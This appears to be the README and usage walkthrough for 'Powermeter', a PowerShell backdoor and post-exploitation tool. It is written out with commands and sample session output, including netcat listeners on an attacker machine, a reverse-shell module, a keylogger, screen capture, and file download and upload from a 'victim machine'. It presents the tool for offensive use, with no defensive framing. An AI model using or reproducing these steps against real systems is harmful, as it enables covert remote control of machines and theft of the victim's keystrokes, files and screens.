Powermeter is a basic powershell based backdoor/post exploit tool. Main functionalities are shown below. You can also check the video at the bottom of the page. Note: It is highly recommended to watch the video at 1080p due to low quality of recording. It will be fixed soon :=)
To run this program you need to solve execution-policy problem on your system.
#Import powermeter functions
>> PS C:\Users\decoder\Desktop> . .\powermeter.ps1
#Start powermeter.
#When this command is invoked, powermeter will establish a TCP connection to $SHOST:$SPORT (in this case After that, powermeter remote user interface will be ready to take commands and attacker will be able to use powermeter via this tcp connection.
#$SPORT should be opened at $SHOST machine (in other words, attacker machine).'nc -lvp <SPORT>' command can do the trick. The main connection between powermeter and attacker will be established via this port. Attacker send commands to powermeter from this port.
#$FLPORT will be used for any job which requires file transfer (those are download,upload,screencap and keylogger threads). For example, if you want to download a from victim machine, you need to provide a listener $FLPORT at $SHOST machine like this: 'nc -lvp <FLPORT> > downloadedFile'. After that you can call the download function from powermeter shell like this: 'download C:\Users\decoder\Desktop\cozbeni.zip'
>> PS C:\Users\decoder\Desktop> Start-Powermeter -SHOST -SPORT 9190 -FLPORT 9192
SHOST - attacker machine's IP.
SPORT - an open attacker machine port that waits for powermeter connection. #'nc -lvp <SPORT>' command can do the trick.
FLPORT - attacker machine's file transfer port. This port should be opened at attacker's side to achieve jobs which includes downloading and uploading. (Screencapturing and keylogging are also inclusive because both of them use downloader threads. You may want to see the demo video to see how it works.)
Powermeter>show options
Command Description
------- -----------
get sysinfo Get system information about victim machine
get username Get username of victim machine
set FLPORT=<port> Set file transfer port
rshell Open reverse shell module
start keylogger Start keylogger thread
show jobs Show all active threads
stop job -keylogger Stop keylogger thread and download captured keystrokes from file port
stop job -reverseShell Stop reverse shell session and thread
stop job -sendFile Stop file downloading thread
stop job -receiveFile Stop file uploading thread
stop job -all Stop all active threads
screencap -screen Capture screenshot of victim machine [WHOLE SCREEN] and download it
screencap -activeWindow Capture screenshot of victim machine [ACTIVE WINDOW] and download it
download <fileFromVictim> Download a file from victim machine.[<fileFromVictim>: An absolute file path in victim machine that the attacker downloads]
upload <fileToVictim> Upload a file to victim machine.[<fileToVictim>: An absolute file path in victim machine to store file uploaded by attacker]
exit Exit the program
Important: File transfer port should be opened at attacker's side to achieve downloading,uploading files.
Powermeter>get sysinfo
Name Value
------- --------
OS Version: Microsoft Windows 7 Enterprise
Install Date: 20171223133718.000000+180
Service Pack Version: 1
OS Architecture: 64-bit
Boot Device: \Device\HarddiskVolume1
Build Number: 7601
Host Name: WIN-1D86SE11EIA
Internet Explorer Version: 8.0.7601.17514
Powershell>set FLPORT=9192
[+]FLPORT is set
Powermeter>get username
On attacker side> nc -lvp 9191
Powermeter>reverse_shell>set LHOST=
[+]LHOST is set
Powermeter>reverse_shell>set LPORT=9191
[+]LPORT is set
Powermeter>reverse_shell>[+]TCP reverse shell
Other commands in reverse shell module:
Powermeter>reverse_shell>show options
Command Description
------- -----------
set LHOST=<IPv4> Set local IP address
set LPORT=<port> Set local port address
run Start reverse shell
back Exit from reverse shell module
Powermeter>stop job -reverseShell
[+]ReverseShellJob is terminated..
Powermeter>show jobs
[+]Active jobs:
JobStateInfo : Running
Finished : System.Threading.ManualResetEvent
InstanceId : 50fae208-73d2-4ea0-8f91-0c37597c918b
Id : 5
Name : ReverseShellJob
ChildJobs : {Job6}
Output : {}
Error : {}
Progress : {}
Verbose : {}
Debug : {}
Warning : {}
State : Running
Powermeter>stop job -all
[+]ReverseShellJob is terminated..
[+]ReceiveFileJob is terminated..
On attacker side> nc -lvp 9192 > screenshot.png
Powermeter>screencap -screen
[+]Screenshot saved..
On attacker side> nc -lvp 9192 > screenshotActiveWindow.png
Powermeter>screencap -activeWindow
[+]Screenshot is saving..
On attacker side> nc -lvp 9192 > log.txt
Powermeter>start keylogger
[+]KeyLogger is starting..
Powermeter>stop job -keylogger
[+]Keylogger is terminated..
On attacker side> nc -lvp 9192 > downloadedFile
Powermeter>download C:\Users\decoder\Desktop\cozbeni.zip
[+]File is downloading..
On attacker side> nc -lvp 9192 \< uploadedFile
Powermeter>upload C:\Users\decoder\Desktop\img.jpg
[+]File is uploading..